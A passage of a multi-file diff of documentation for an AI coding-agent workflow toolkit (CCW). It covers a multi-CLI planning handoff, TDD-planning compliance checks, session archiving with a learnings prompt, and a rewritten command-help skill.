| `implementation_plan.milestones` | string[] | Key checkpoints |
|
||||
| `dependencies` | object | Module and package dependencies |
|
||||
| `technical_concerns` | string[] | Risks and blockers |
|
||||
| `consensus` | object | Cross-verified agreements from multi-CLI |
|
||||
| `constraints` | string[] | User-specified constraints from Phase 4 |
|
||||
|
||||
```json
|
||||
{
|
||||
"solution": {
|
||||
"name": "Strategy Pattern Refactoring",
|
||||
"source_cli": ["gemini", "codex"],
|
||||
"feasibility": 0.88,
|
||||
"effort": "medium",
|
||||
"risk": "low",
|
||||
"summary": "Extract payment gateway interface, implement strategy pattern for multi-gateway support"
|
||||
},
|
||||
"implementation_plan": {
|
||||
"approach": "Define interface → Create concrete strategies → Implement factory → Migrate existing code",
|
||||
"tasks": [
|
||||
{"id": "T1", "name": "Define PaymentGateway interface", "depends_on": [], "files": [{"file": "src/types/payment.ts", "line": 1, "action": "create"}], "key_point": "Include all existing Stripe methods"},
|
||||
{"id": "T2", "name": "Implement StripeGateway", "depends_on": ["T1"], "files": [{"file": "src/payment/stripe.ts", "line": 1, "action": "create"}], "key_point": "Wrap existing logic"},
|
||||
{"id": "T3", "name": "Create GatewayFactory", "depends_on": ["T1"], "files": [{"file": "src/payment/factory.ts", "line": 1, "action": "create"}], "key_point": null},
|
||||
{"id": "T4", "name": "Migrate processor to use factory", "depends_on": ["T2", "T3"], "files": [{"file": "src/payment/processor.ts", "line": 45, "action": "modify"}], "key_point": "Backward compatible"}
|
||||
],
|
||||
"execution_flow": "T1 → (T2 | T3) → T4",
|
||||
"milestones": ["Interface defined", "Gateway implementations complete", "Migration done"]
|
||||
},
|
||||
"dependencies": {
|
||||
"internal": ["@/lib/payment-gateway", "@/types/payment"],
|
||||
"external": ["stripe@^14.0.0"]
|
||||
},
|
||||
"technical_concerns": ["Existing tests must pass", "No breaking API changes"],
|
||||
"consensus": {
|
||||
"agreements": ["Use strategy pattern", "Keep existing API"],
|
||||
"resolved_conflicts": "Factory over DI for simpler integration"
|
||||
},
|
||||
"constraints": ["backward compatible", "no breaking changes to PaymentResult type"],
|
||||
"task_description": "Refactor payment processing for multi-gateway support",
|
||||
"session_id": "MCP-payment-refactor-2026-01-14"
|
||||
}
|
||||
```
|
||||
|
||||
**Step 2: Invoke Planning Agent**:
|
||||
```javascript
|
||||
Task({
|
||||
subagent_type: "cli-lite-planning-agent",
|
||||
run_in_background: false,
|
||||
description: "Generate implementation plan",
|
||||
prompt: `
|
||||
## Schema Reference
|
||||
Execute: cat ~/.claude/workflows/cli-templates/schemas/plan-json-schema.json
|
||||
|
||||
## Context-Package (from orchestrator)
|
||||
${JSON.stringify(contextPackage, null, 2)}
|
||||
|
||||
## Execution Process
|
||||
1. Read plan-json-schema.json for output structure
|
||||
2. Read project-tech.json and project-guidelines.json
|
||||
3. Parse context-package fields:
|
||||
- solution: name, feasibility, summary
|
||||
- implementation_plan: tasks[], execution_flow, milestones
|
||||
- dependencies: internal[], external[]
|
||||
- technical_concerns: risks/blockers
|
||||
- consensus: agreements, resolved_conflicts
|
||||
- constraints: user requirements
|
||||
4. Use implementation_plan.tasks[] as task foundation
|
||||
5. Preserve task dependencies (depends_on) and execution_flow
|
||||
6. Expand tasks with detailed acceptance criteria
|
||||
7. Generate plan.json following schema exactly
|
||||
|
||||
## Output
|
||||
- ${sessionFolder}/plan.json
|
||||
|
||||
## Completion Checklist
|
||||
- [ ] plan.json preserves task dependencies from implementation_plan
|
||||
- [ ] Task execution order follows execution_flow
|
||||
- [ ] Key_points reflected in task descriptions
|
||||
- [ ] User constraints applied to implementation
|
||||
- [ ] Acceptance criteria are testable
|
||||
- [ ] Schema fields match plan-json-schema.json exactly
|
||||
`
|
||||
})
|
||||
```
|
||||
|
||||
**Step 3: Build executionContext**:
|
||||
```javascript
|
||||
// After plan.json is generated by cli-lite-planning-agent
|
||||
const plan = JSON.parse(Read(`${sessionFolder}/plan.json`))
|
||||
|
||||
// Build executionContext (same structure as lite-plan)
|
||||
executionContext = {
|
||||
planObject: plan,
|
||||
explorationsContext: null, // Multi-CLI doesn't use exploration files
|
||||
explorationAngles: [], // No exploration angles
|
||||
explorationManifest: null, // No manifest
|
||||
clarificationContext: null, // Store user feedback from Phase 2 if exists
|
||||
executionMethod: userSelection.execution_method, // From Phase 4
|
||||
codeReviewTool: userSelection.code_review_tool, // From Phase 4
|
||||
originalUserInput: taskDescription,
|
||||
|
||||
// Optional: Task-level executor assignments
|
||||
executorAssignments: null, // Could be enhanced in future
|
||||
|
||||
session: {
|
||||
id: sessionId,
|
||||
folder: sessionFolder,
|
||||
artifacts: {
|
||||
explorations: [], // No explorations in multi-CLI workflow
|
||||
explorations_manifest: null,
|
||||
plan: `${sessionFolder}/plan.json`,
|
||||
synthesis_rounds: Array.from({length: currentRound}, (_, i) =>
|
||||
`${sessionFolder}/rounds/${i+1}/synthesis.json`
|
||||
),
|
||||
context_package: `${sessionFolder}/context-package.json`
|
||||
}
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
**Step 4: Hand off to Execution**:
|
||||
```javascript
|
||||
// Execute to lite-execute with in-memory context
|
||||
SlashCommand("/workflow:lite-execute --in-memory")
|
||||
```
|
||||
|
||||
## Output File Structure
|
||||
|
||||
```
|
||||
.workflow/.multi-cli-plan/{MCP-task-slug-YYYY-MM-DD}/
|
||||
├── session-state.json # Session tracking (orchestrator)
|
||||
├── rounds/
|
||||
│ ├── 1/synthesis.json # Round 1 analysis (cli-discuss-agent)
|
||||
│ ├── 2/synthesis.json # Round 2 analysis (cli-discuss-agent)
|
||||
│ └── .../
|
||||
├── context-package.json # Extracted context for planning (orchestrator)
|
||||
└── plan.json # Structured plan (cli-lite-planning-agent)
|
||||
```
|
||||
|
||||
**File Producers**:
|
||||
|
||||
| File | Producer | Content |
|
||||
|------|----------|---------|
|
||||
| `session-state.json` | Orchestrator | Session metadata, rounds, decisions |
|
||||
| `rounds/*/synthesis.json` | cli-discuss-agent | Solutions, convergence, cross-verification |
|
||||
| `context-package.json` | Orchestrator | Extracted solution, dependencies, consensus for planning |
|
||||
| `plan.json` | cli-lite-planning-agent | Structured tasks for lite-execute |
|
||||
|
||||
## synthesis.json Schema
|
||||
|
||||
```json
|
||||
{
|
||||
"round": 1,
|
||||
"solutions": [{
|
||||
"name": "Solution Name",
|
||||
"source_cli": ["gemini", "codex"],
|
||||
"feasibility": 0.85,
|
||||
"effort": "low|medium|high",
|
||||
"risk": "low|medium|high",
|
||||
"summary": "Brief analysis summary",
|
||||
"implementation_plan": {
|
||||
"approach": "High-level technical approach",
|
||||
"tasks": [
|
||||
{"id": "T1", "name": "Task", "depends_on": [], "files": [], "key_point": "..."}
|
||||
],
|
||||
"execution_flow": "T1 → T2 → T3",
|
||||
"milestones": ["Checkpoint 1", "Checkpoint 2"]
|
||||
},
|
||||
"dependencies": {"internal": [], "external": []},
|
||||
"technical_concerns": ["Risk 1", "Blocker 2"]
|
||||
}],
|
||||
"convergence": {
|
||||
"score": 0.85,
|
||||
"new_insights": false,
|
||||
"recommendation": "converged|continue|user_input_needed"
|
||||
},
|
||||
"cross_verification": {
|
||||
"agreements": [],
|
||||
"disagreements": [],
|
||||
"resolution": "..."
|
||||
},
|
||||
"clarification_questions": []
|
||||
}
|
||||
```
|
||||
|
||||
**Key Planning Fields**:
|
||||
|
||||
| Field | Purpose |
|
||||
|-------|---------|
|
||||
| `feasibility` | Viability score (0-1) |
|
||||
| `implementation_plan.tasks[]` | Discrete tasks with dependencies |
|
||||
| `implementation_plan.execution_flow` | Task sequence visualization |
|
||||
| `implementation_plan.milestones` | Key checkpoints |
|
||||
| `technical_concerns` | Risks and blockers |
|
||||
|
||||
**Note**: Solutions ranked by internal scoring (array order = priority)
|
||||
|
||||
## TodoWrite Structure
|
||||
|
||||
**Initialization**:
|
||||
```javascript
|
||||
TodoWrite({ todos: [
|
||||
{ content: "Phase 1: Context Gathering", status: "in_progress", activeForm: "Gathering context" },
|
||||
{ content: "Phase 2: Multi-CLI Discussion", status: "pending", activeForm: "Running discussion" },
|
||||
{ content: "Phase 3: Present Options", status: "pending", activeForm: "Presenting options" },
|
||||
{ content: "Phase 4: User Decision", status: "pending", activeForm: "Awaiting decision" },
|
||||
{ content: "Phase 5: Plan Generation", status: "pending", activeForm: "Generating plan" }
|
||||
]})
|
||||
```
|
||||
|
||||
**During Discussion Rounds**:
|
||||
```javascript
|
||||
TodoWrite({ todos: [
|
||||
{ content: "Phase 1: Context Gathering", status: "completed", activeForm: "Gathering context" },
|
||||
{ content: "Phase 2: Multi-CLI Discussion", status: "in_progress", activeForm: "Running discussion" },
|
||||
{ content: " → Round 1: Initial analysis", status: "completed", activeForm: "Analyzing" },
|
||||
{ content: " → Round 2: Deep verification", status: "in_progress", activeForm: "Verifying" },
|
||||
{ content: "Phase 3: Present Options", status: "pending", activeForm: "Presenting options" },
|
||||
// ...
|
||||
]})
|
||||
```
|
||||
|
||||
## Error Handling
|
||||
|
||||
| Error | Resolution |
|
||||
|-------|------------|
|
||||
| ACE search fails | Fall back to Glob/Grep for file discovery |
|
||||
| Agent fails | Retry once, then present partial results |
|
||||
| CLI timeout (in agent) | Agent uses fallback: gemini → codex → claude |
|
||||
| No convergence | Present best options, flag uncertainty |
|
||||
| synthesis.json parse error | Request agent retry |
|
||||
| User cancels | Save session for later resumption |
|
||||
|
||||
## Configuration
|
||||
|
||||
| Flag | Default | Description |
|
||||
|------|---------|-------------|
|
||||
| `--max-rounds` | 3 | Maximum discussion rounds |
|
||||
| `--tools` | gemini,codex | CLI tools for analysis |
|
||||
| `--mode` | parallel | Execution mode: parallel or serial |
|
||||
| `--auto-execute` | false | Auto-execute after approval |
|
||||
|
||||
## Best Practices
|
||||
|
||||
1. **Be Specific**: Detailed task descriptions improve ACE context quality
|
||||
2. **Provide Feedback**: Use clarification rounds to refine requirements
|
||||
3. **Trust Cross-Verification**: Multi-CLI consensus indicates high confidence
|
||||
4. **Review Trade-offs**: Consider pros/cons before selecting solution
|
||||
5. **Check synthesis.json**: Review agent output for detailed analysis
|
||||
6. **Iterate When Needed**: Don't hesitate to request more analysis
|
||||
|
||||
## Related Commands
|
||||
|
||||
```bash
|
||||
# Simpler single-round planning
|
||||
/workflow:lite-plan "task description"
|
||||
|
||||
# Issue-driven discovery
|
||||
/issue:discover-by-prompt "find issues"
|
||||
|
||||
# View session files
|
||||
cat .workflow/.multi-cli-plan/{session-id}/plan.json
|
||||
cat .workflow/.multi-cli-plan/{session-id}/rounds/1/synthesis.json
|
||||
cat .workflow/.multi-cli-plan/{session-id}/context-package.json
|
||||
|
||||
# Direct execution (if you have plan.json)
|
||||
/workflow:lite-execute plan.json
|
||||
```
|
||||
@@ -585,6 +585,10 @@ TodoWrite({
|
||||
- Mark completed immediately after each group finishes
|
||||
- Update parent phase status when all child items complete
|
||||
|
||||
## Post-Completion Expansion
|
||||
|
||||
完成后询问用户是否扩展为issue(test/enhance/refactor/doc),选中项调用 `/issue:new "{summary} - {dimension}"`
|
||||
|
||||
## Best Practices
|
||||
|
||||
1. **Trust AI Planning**: Planning agent's grouping and execution strategy are based on dependency analysis
|
||||
|
||||
@@ -107,13 +107,13 @@ rm -f .workflow/archives/$SESSION_ID/.archiving
|
||||
Manifest: Updated with N total sessions
|
||||
```
|
||||
|
||||
### Phase 4: Update project.json (Optional)
|
||||
### Phase 4: Update project-tech.json (Optional)
|
||||
|
||||
**Skip if**: `.workflow/project.json` doesn't exist
|
||||
**Skip if**: `.workflow/project-tech.json` doesn't exist
|
||||
|
||||
```bash
|
||||
# Check
|
||||
test -f .workflow/project.json || echo "SKIP"
|
||||
test -f .workflow/project-tech.json || echo "SKIP"
|
||||
```
|
||||
|
||||
**If exists**, add feature entry:
|
||||
@@ -134,6 +134,32 @@ test -f .workflow/project.json || echo "SKIP"
|
||||
✓ Feature added to project registry
|
||||
```
|
||||
|
||||
### Phase 5: Ask About Solidify (Always)
|
||||
|
||||
After successful archival, prompt user to capture learnings:
|
||||
|
||||
```javascript
|
||||
AskUserQuestion({
|
||||
questions: [{
|
||||
question: "Would you like to solidify learnings from this session into project guidelines?",
|
||||
header: "Solidify",
|
||||
options: [
|
||||
{ label: "Yes, solidify now", description: "Extract learnings and update project-guidelines.json" },
|
||||
{ label: "Skip", description: "Archive complete, no learnings to capture" }
|
||||
],
|
||||
multiSelect: false
|
||||
}]
|
||||
})
|
||||
```
|
||||
|
||||
**If "Yes, solidify now"**: Execute `/workflow:session:solidify` with the archived session ID.
|
||||
|
||||
**Output**:
|
||||
```
|
||||
Session archived successfully.
|
||||
→ Run /workflow:session:solidify to capture learnings (recommended)
|
||||
```
|
||||
|
||||
## Error Recovery
|
||||
|
||||
| Phase | Symptom | Recovery |
|
||||
@@ -149,5 +175,6 @@ test -f .workflow/project.json || echo "SKIP"
|
||||
Phase 1: find session → create .archiving marker
|
||||
Phase 2: read key files → build manifest entry (no writes)
|
||||
Phase 3: mkdir → mv → update manifest.json → rm marker
|
||||
Phase 4: update project.json features array (optional)
|
||||
Phase 4: update project-tech.json features array (optional)
|
||||
Phase 5: ask user → solidify learnings (optional)
|
||||
```
|
||||
|
||||
@@ -16,7 +16,7 @@ examples:
|
||||
Manages workflow sessions with three operation modes: discovery (manual), auto (intelligent), and force-new.
|
||||
|
||||
**Dual Responsibility**:
|
||||
1. **Project-level initialization** (first-time only): Creates `.workflow/project.json` for feature registry
|
||||
1. **Project-level initialization** (first-time only): Creates `.workflow/project-tech.json` for feature registry
|
||||
2. **Session-level initialization** (always): Creates session directory structure
|
||||
|
||||
## Session Types
|
||||
|
||||
@@ -37,6 +37,44 @@ allowed-tools: SlashCommand(*), TodoWrite(*), Read(*), Bash(*)
|
||||
7. **Task Attachment Model**: SlashCommand execute **attaches** sub-tasks to current workflow. Orchestrator **executes** these attached tasks itself, then **collapses** them after completion
|
||||
8. **⚠️ CRITICAL: DO NOT STOP**: Continuous multi-phase workflow. After executing all attached tasks, immediately collapse them and execute next phase
|
||||
|
||||
## TDD Compliance Requirements
|
||||
|
||||
### The Iron Law
|
||||
|
||||
```
|
||||
NO PRODUCTION CODE WITHOUT A FAILING TEST FIRST
|
||||
```
|
||||
|
||||
**Enforcement Method**:
|
||||
- Phase 5: `implementation_approach` includes test-first steps (Red → Green → Refactor)
|
||||
- Green phase: Includes test-fix-cycle configuration (max 3 iterations)
|
||||
- Auto-revert: Triggered when max iterations reached without passing tests
|
||||
|
||||
**Verification**: Phase 6 validates Red-Green-Refactor structure in all generated tasks
|
||||
|
||||
### TDD Compliance Checkpoint
|
||||
|
||||
| Checkpoint | Validation Phase | Evidence Required |
|
||||
|------------|------------------|-------------------|
|
||||
| Test-first structure | Phase 5 | `implementation_approach` has 3 steps |
|
||||
| Red phase exists | Phase 6 | Step 1: `tdd_phase: "red"` |
|
||||
| Green phase with test-fix | Phase 6 | Step 2: `tdd_phase: "green"` + test-fix-cycle |
|
||||
| Refactor phase exists | Phase 6 | Step 3: `tdd_phase: "refactor"` |
|
||||
|
||||
### Core TDD Principles (from ref skills)
|
||||
|
||||
**Red Flags - STOP and Reassess**:
|
||||
- Code written before test
|
||||
- Test passes immediately (no Red phase witnessed)
|
||||
- Cannot explain why test should fail
|
||||
- "Just this once" rationalization
|
||||
- "Tests after achieve same goals" thinking
|
||||
|
||||
**Why Order Matters**:
|
||||
- Tests written after code pass immediately → proves nothing
|
||||
- Test-first forces edge case discovery before implementation
|
||||
- Tests-after verify what was built, not what's required
|
||||
|
||||
## 6-Phase Execution (with Conflict Resolution)
|
||||
|
||||
### Phase 1: Session Discovery
|
||||
@@ -183,7 +221,7 @@ SlashCommand(command="/workflow:tools:conflict-resolution --session [sessionId]
|
||||
{"content": "Phase 3: Test Coverage Analysis", "status": "completed", "activeForm": "Executing test coverage analysis"},
|
||||
{"content": "Phase 4: Conflict Resolution", "status": "in_progress", "activeForm": "Executing conflict resolution"},
|
||||
{"content": " → Detect conflicts with CLI analysis", "status": "in_progress", "activeForm": "Detecting conflicts"},
|
||||
{"content": " → Present conflicts to user", "status": "pending", "activeForm": "Presenting conflicts"},
|
||||
{"content": " → Log and analyze detected conflicts", "status": "pending", "activeForm": "Analyzing conflicts"},
|
||||
{"content": " → Apply resolution strategies", "status": "pending", "activeForm": "Applying resolution strategies"},
|
||||
{"content": "Phase 5: TDD Task Generation", "status": "pending", "activeForm": "Executing TDD task generation"},
|
||||
{"content": "Phase 6: TDD Structure Validation", "status": "pending", "activeForm": "Validating TDD structure"}
|
||||
@@ -251,6 +289,13 @@ SlashCommand(command="/workflow:tools:task-generate-tdd --session [sessionId]")
|
||||
- IMPL_PLAN.md contains workflow_type: "tdd" in frontmatter
|
||||
- Task count ≤10 (compliance with task limit)
|
||||
|
||||
**Red Flag Detection** (Non-Blocking Warnings):
|
||||
- Task count >10: `⚠️ High task count may indicate insufficient decomposition`
|
||||
- Missing test-fix-cycle: `⚠️ Green phase lacks auto-revert configuration`
|
||||
- Generic task names: `⚠️ Vague task names suggest unclear TDD cycles`
|
||||
|
||||
**Action**: Log warnings to `.workflow/active/[sessionId]/.process/tdd-warnings.log` (non-blocking)
|
||||
|
||||
<!-- TodoWrite: When task-generate-tdd executed, INSERT 3 task-generate-tdd tasks -->
|
||||
|
||||
**TodoWrite Update (Phase 5 SlashCommand executed - tasks attached)**:
|
||||
@@ -302,6 +347,42 @@ SlashCommand(command="/workflow:tools:task-generate-tdd --session [sessionId]")
|
||||
5. Test-fix cycle: Green phase step includes test-fix-cycle logic with max_iterations
|
||||
6. Task count: Total tasks ≤10 (simple + subtasks)
|
||||
|
||||
**Red Flag Checklist** (from TDD best practices):
|
||||
- [ ] No tasks skip Red phase (`tdd_phase: "red"` exists in step 1)
|
||||
- [ ] Test files referenced in Red phase (explicit paths, not placeholders)
|
||||
- [ ] Green phase has test-fix-cycle with `max_iterations` configured
|
||||
- [ ] Refactor phase has clear completion criteria
|
||||
|
||||
**Non-Compliance Warning Format**:
|
||||
```
|
||||
⚠️ TDD Red Flag: [issue description]
|
||||
Task: [IMPL-N]
|
||||
Recommendation: [action to fix]
|
||||
```
|
||||
|
||||
**Evidence Gathering** (Before Completion Claims):
|
||||
|
||||
```bash
|
||||
# Verify session artifacts exist
|
||||
ls -la .workflow/active/[sessionId]/{IMPL_PLAN.md,TODO_LIST.md}
|
||||
ls -la .workflow/active/[sessionId]/.task/IMPL-*.json
|
||||
|
||||
# Count generated artifacts
|
||||
echo "IMPL tasks: $(ls .workflow/active/[sessionId]/.task/IMPL-*.json 2>/dev/null | wc -l)"
|
||||
|
||||
# Sample task structure verification (first task)
|
||||
jq '{id, tdd: .meta.tdd_workflow, phases: [.flow_control.implementation_approach[].tdd_phase]}' \
|
||||
"$(ls .workflow/active/[sessionId]/.task/IMPL-*.json | head -1)"
|
||||
```
|
||||
|
||||
**Evidence Required Before Summary**:
|
||||
| Evidence Type | Verification Method | Pass Criteria |
|
||||
|---------------|---------------------|---------------|
|
||||
| File existence | `ls -la` artifacts | All files present |
|
||||
| Task count | Count IMPL-*.json | Count matches claims |
|
||||
| TDD structure | jq sample extraction | Shows red/green/refactor |
|
||||
| Warning log | Check tdd-warnings.log | Logged (may be empty) |
|
||||
|
||||
**Return Summary**:
|
||||
```
|
||||
TDD Planning complete for session: [sessionId]
|
||||
@@ -333,6 +414,9 @@ TDD Configuration:
|
||||
- Green phase includes test-fix cycle (max 3 iterations)
|
||||
- Auto-revert on max iterations reached
|
||||
|
||||
⚠️ ACTION REQUIRED: Before execution, ensure you understand WHY each Red phase test is expected to fail.
|
||||
This is crucial for valid TDD - if you don't know why the test fails, you can't verify it tests the right thing.
|
||||
|
||||
Recommended Next Steps:
|
||||
1. /workflow:action-plan-verify --session [sessionId] # Verify TDD plan quality and dependencies
|
||||
2. /workflow:execute --session [sessionId] # Start TDD execution
|
||||
@@ -400,7 +484,7 @@ TDD Workflow Orchestrator
|
||||
│ IF conflict_risk ≥ medium:
|
||||
│ └─ /workflow:tools:conflict-resolution ← ATTACHED (3 tasks)
|
||||
│ ├─ Phase 4.1: Detect conflicts with CLI
|
||||
│ ├─ Phase 4.2: Present conflicts to user
|
||||
│ ├─ Phase 4.2: Log and analyze detected conflicts
|
||||
│ └─ Phase 4.3: Apply resolution strategies
|
||||
│ └─ Returns: conflict-resolution.json ← COLLAPSED
|
||||
│ ELSE:
|
||||
@@ -439,6 +523,34 @@ Convert user input to TDD-structured format:
|
||||
- **Command failure**: Keep phase in_progress, report error
|
||||
- **TDD validation failure**: Report incomplete chains or wrong dependencies
|
||||
|
||||
### TDD Warning Patterns
|
||||
|
||||
| Pattern | Warning Message | Recommended Action |
|
||||
|---------|----------------|-------------------|
|
||||
| Task count >10 | High task count detected | Consider splitting into multiple sessions |
|
||||
| Missing test-fix-cycle | Green phase lacks auto-revert | Add `max_iterations: 3` to task config |
|
||||
| Red phase missing test path | Test file path not specified | Add explicit test file paths |
|
||||
| Generic task names | Vague names like "Add feature" | Use specific behavior descriptions |
|
||||
| No refactor criteria | Refactor phase lacks completion criteria | Define clear refactor scope |
|
||||
|
||||
### Non-Blocking Warning Policy
|
||||
|
||||
**All warnings are advisory** - they do not halt execution:
|
||||
1. Warnings logged to `.process/tdd-warnings.log`
|
||||
2. Summary displayed in Phase 6 output
|
||||
3. User decides whether to address before `/workflow:execute`
|
||||
|
||||
### Error Handling Quick Reference
|
||||
|
||||
| Error Type | Detection | Recovery Action |
|
||||
|------------|-----------|-----------------|
|
||||
| Parsing failure | Empty/malformed output | Retry once, then report |
|
||||
| Missing context-package | File read error | Re-run `/workflow:tools:context-gather` |
|
||||
| Invalid task JSON | jq parse error | Report malformed file path |
|
||||
| High task count (>10) | Count validation | Log warning, continue (non-blocking) |
|
||||
| Test-context missing | File not found | Re-run `/workflow:tools:test-context-gather` |
|
||||
| Phase timeout | No response | Retry phase, check CLI connectivity |
|
||||
|
||||
## Related Commands
|
||||
|
||||
**Prerequisite Commands**:
|
||||
@@ -458,3 +570,28 @@ Convert user input to TDD-structured format:
|
||||
- `/workflow:execute` - Begin TDD implementation
|
||||
- `/workflow:tdd-verify` - Post-execution: Verify TDD compliance and generate quality report
|
||||
|
||||
## Next Steps Decision Table
|
||||
|
||||
| Situation | Recommended Command | Purpose |
|
||||
|-----------|---------------------|---------|
|
||||
| First time planning | `/workflow:action-plan-verify` | Validate task structure before execution |
|
||||
| Warnings in tdd-warnings.log | Review log, refine tasks | Address Red Flags before proceeding |
|
||||
| High task count warning | Consider `/workflow:session:start` | Split into focused sub-sessions |
|
||||
| Ready to implement | `/workflow:execute` | Begin TDD Red-Green-Refactor cycles |
|
||||
| After implementation | `/workflow:tdd-verify` | Generate TDD compliance report |
|
||||
| Need to review tasks | `/workflow:status --session [id]` | Inspect current task breakdown |
|
||||
| Plan needs changes | `/task:replan` | Update task JSON with new requirements |
|
||||
|
||||
### TDD Workflow State Transitions
|
||||
|
||||
```
|
||||
/workflow:tdd-plan
|
||||
↓
|
||||
[Planning Complete] ──→ /workflow:action-plan-verify (recommended)
|
||||
↓
|
||||
[Verified/Ready] ─────→ /workflow:execute
|
||||
↓
|
||||
[Implementation] ─────→ /workflow:tdd-verify (post-execution)
|
||||
↓
|
||||
[Quality Report] ─────→ Done or iterate
|
||||
```
|
||||
|
||||
@@ -491,6 +491,10 @@ The orchestrator automatically creates git commits at key checkpoints to enable
|
||||
|
||||
**Note**: Final session completion creates additional commit with full summary.
|
||||
|
||||
## Post-Completion Expansion
|
||||
|
||||
完成后询问用户是否扩展为issue(test/enhance/refactor/doc),选中项调用 `/issue:new "{summary} - {dimension}"`
|
||||
|
||||
## Best Practices
|
||||
|
||||
1. **Default Settings Work**: 10 iterations sufficient for most cases
|
||||
|
||||
@@ -154,8 +154,8 @@ Task(subagent_type="cli-execution-agent", run_in_background=false, prompt=`
|
||||
- Validation of exploration conflict_indicators
|
||||
- ModuleOverlap conflicts with overlap_analysis
|
||||
- Targeted clarification questions
|
||||
RULES: $(cat ~/.claude/workflows/cli-templates/prompts/analysis/02-analyze-code-patterns.txt) | Focus on breaking changes, migration needs, and functional overlaps | Prioritize exploration-identified conflicts | analysis=READ-ONLY
|
||||
" --tool gemini --mode analysis --cd {project_root}
|
||||
CONSTRAINTS: Focus on breaking changes, migration needs, and functional overlaps | Prioritize exploration-identified conflicts | analysis=READ-ONLY
|
||||
" --tool gemini --mode analysis --rule analysis-code-patterns --cd {project_root}
|
||||
|
||||
Fallback: Qwen (same prompt) → Claude (manual analysis)
|
||||
|
||||
|
||||
@@ -237,7 +237,7 @@ Execute complete context-search-agent workflow for implementation planning:
|
||||
|
||||
### Phase 1: Initialization & Pre-Analysis
|
||||
1. **Project State Loading**:
|
||||
- Read and parse `.workflow/project-tech.json`. Use its `technology_analysis` section as the foundational `project_context`. This is your primary source for architecture, tech stack, and key components.
|
||||
- Read and parse `.workflow/project-tech.json`. Use its `overview` section as the foundational `project_context`. This is your primary source for architecture, tech stack, and key components.
|
||||
- Read and parse `.workflow/project-guidelines.json`. Load `conventions`, `constraints`, and `learnings` into a `project_guidelines` section.
|
||||
- If files don't exist, proceed with fresh analysis.
|
||||
2. **Detection**: Check for existing context-package (early exit if valid)
|
||||
@@ -255,7 +255,7 @@ Execute all discovery tracks:
|
||||
### Phase 3: Synthesis, Assessment & Packaging
|
||||
1. Apply relevance scoring and build dependency graph
|
||||
2. **Synthesize 4-source data**: Merge findings from all sources (archive > docs > code > web). **Prioritize the context from `project-tech.json`** for architecture and tech stack unless code analysis reveals it's outdated.
|
||||
3. **Populate `project_context`**: Directly use the `technology_analysis` from `project-tech.json` to fill the `project_context` section. Include description, technology_stack, architecture, and key_components.
|
||||
3. **Populate `project_context`**: Directly use the `overview` from `project-tech.json` to fill the `project_context` section. Include description, technology_stack, architecture, and key_components.
|
||||
4. **Populate `project_guidelines`**: Load conventions, constraints, and learnings from `project-guidelines.json` into a dedicated section.
|
||||
5. Integrate brainstorm artifacts (if .brainstorming/ exists, read content)
|
||||
6. Perform conflict detection with risk assessment
|
||||
|
||||
@@ -90,7 +90,7 @@ Template: ~/.claude/workflows/cli-templates/prompts/test/test-concept-analysis.t
|
||||
|
||||
## EXECUTION STEPS
|
||||
1. Execute Gemini analysis:
|
||||
ccw cli -p "$(cat ~/.claude/workflows/cli-templates/prompts/test/test-concept-analysis.txt)" --tool gemini --mode write --cd .workflow/active/{test_session_id}/.process
|
||||
ccw cli -p "..." --tool gemini --mode write --rule test-test-concept-analysis --cd .workflow/active/{test_session_id}/.process
|
||||
|
||||
2. Generate TEST_ANALYSIS_RESULTS.md:
|
||||
Synthesize gemini-test-analysis.md into standardized format for task generation
|
||||
|
||||
@@ -1,139 +1,86 @@
|
||||
---
|
||||
name: ccw-help
|
||||
description: Workflow command guide for Claude Code Workflow (78 commands). Search/browse commands, get next-step recommendations, view documentation, report issues. Triggers "CCW-help", "CCW-issue", "ccw-help", "ccw-issue", "ccw"
|
||||
description: CCW command help system. Search, browse, recommend commands. Triggers "ccw-help", "ccw-issue".
|
||||
allowed-tools: Read, Grep, Glob, AskUserQuestion
|
||||
version: 6.0.0
|
||||
version: 7.0.0
|
||||
---
|
||||
|
||||
# CCW-Help Skill
|
||||
|
||||
CCW 命令帮助系统,提供命令搜索、推荐、文档查看和问题报告功能。
|
||||
CCW 命令帮助系统,提供命令搜索、推荐、文档查看功能。
|
||||
|
||||
## Trigger Conditions
|
||||
|
||||
- 关键词: "CCW-help", "CCW-issue", "ccw-help", "ccw-issue", "帮助", "命令", "怎么用"
|
||||
- 场景: 用户询问命令用法、搜索命令、请求下一步建议、报告问题
|
||||
|
||||
## Execution Flow
|
||||
|
||||
```mermaid
|
||||
graph TD
|
||||
A[User Query] --> B{Intent Classification}
|
||||
B -->|搜索| C[Command Search]
|
||||
B -->|推荐| D[Smart Recommendations]
|
||||
B -->|文档| E[Documentation]
|
||||
B -->|新手| F[Onboarding]
|
||||
B -->|问题| G[Issue Reporting]
|
||||
B -->|分析| H[Deep Analysis]
|
||||
|
||||
C --> I[Query Index]
|
||||
D --> J[Query Relationships]
|
||||
E --> K[Read Source File]
|
||||
F --> L[Essential Commands]
|
||||
G --> M[Generate Template]
|
||||
H --> N[CLI Analysis]
|
||||
|
||||
I & J & K & L & M & N --> O[Synthesize Response]
|
||||
```
|
||||
- 关键词: "ccw-help", "ccw-issue", "帮助", "命令", "怎么用"
|
||||
- 场景: 询问命令用法、搜索命令、请求下一步建议
|
||||
|
||||
## Operation Modes
|
||||
|
||||
### Mode 1: Command Search 🔍
|
||||
### Mode 1: Command Search
|
||||
|
||||
**Triggers**: "搜索命令", "find command", "planning 相关", "search"
|
||||
**Triggers**: "搜索命令", "find command", "search"
|
||||
|
||||
**Process**:
|
||||
1. Query `index/all-commands.json` or `index/by-category.json`
|
||||
2. Filter and rank results based on user context
|
||||
3. Present top 3-5 relevant commands with usage hints
|
||||
1. Query `command.json` commands array
|
||||
2. Filter by name, description, category
|
||||
3. Present top 3-5 relevant commands
|
||||
|
||||
### Mode 2: Smart Recommendations 🤖
|
||||
### Mode 2: Smart Recommendations
|
||||
|
||||
**Triggers**: "下一步", "what's next", "after /workflow:plan", "推荐"
|
||||
**Triggers**: "下一步", "what's next", "推荐"
|
||||
|
||||
**Process**:
|
||||
1. Query `index/command-relationships.json`
|
||||
2. Evaluate context and prioritize recommendations
|
||||
3. Explain WHY each recommendation fits
|
||||
1. Query command's `flow.next_steps` in `command.json`
|
||||
2. Explain WHY each recommendation fits
|
||||
|
||||
### Mode 3: Full Documentation 📖
|
||||
### Mode 3: Documentation
|
||||
|
||||
**Triggers**: "参数说明", "怎么用", "how to use", "详情"
|
||||
**Triggers**: "怎么用", "how to use", "详情"
|
||||
|
||||
**Process**:
|
||||
1. Locate command in index
|
||||
